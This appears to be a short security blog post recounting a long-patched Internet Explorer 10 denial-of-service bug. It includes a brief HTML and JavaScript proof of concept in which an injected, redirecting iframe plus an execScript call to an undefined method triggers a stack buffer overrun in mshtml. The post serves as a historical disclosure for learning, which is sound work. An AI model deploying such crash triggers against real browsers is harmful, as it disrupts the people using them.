IE10 DoS: Injected iFrame Redirect + Calling Non-Existent Method Triggers Stack Buffer Overrun

Injecting an iframe that immediately redirected, and then calling a non-existent method inside that iframe via execScript after the redirect completed, caused a stack buffer overrun (__report_gsfailure) in IE10.

<script>
function main()
{
    document.getElementById("containerDiv").innerHTML = '<iframe name="iFrame" src="redirect.aspx" width="600" height="80"></iframe>';

    iFrame.execScript(
        "alert('Once Bing is loaded, close this alert to crash the Browser');" +
        "NonExistantMethod();" // Crash!
    );
}
</script>
<input type="button" onclick="main()" value="Insert iFrame, redirect, and execute a non-existant method">
<div id="containerDiv"></div>

The fault triggered mshtml!__report_gsfailure, indicating a GS cookie stack protection violation during execScript processing of the undefined method call in the redirect context.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE10 UXSS: Cached XHR Object Retains Cross-Origin Access After Redirect] :: [IE10 EoP: htmlFile ActiveX Reload + setTimeout document.open/close is PROBABLY_EXPLOITABLE] >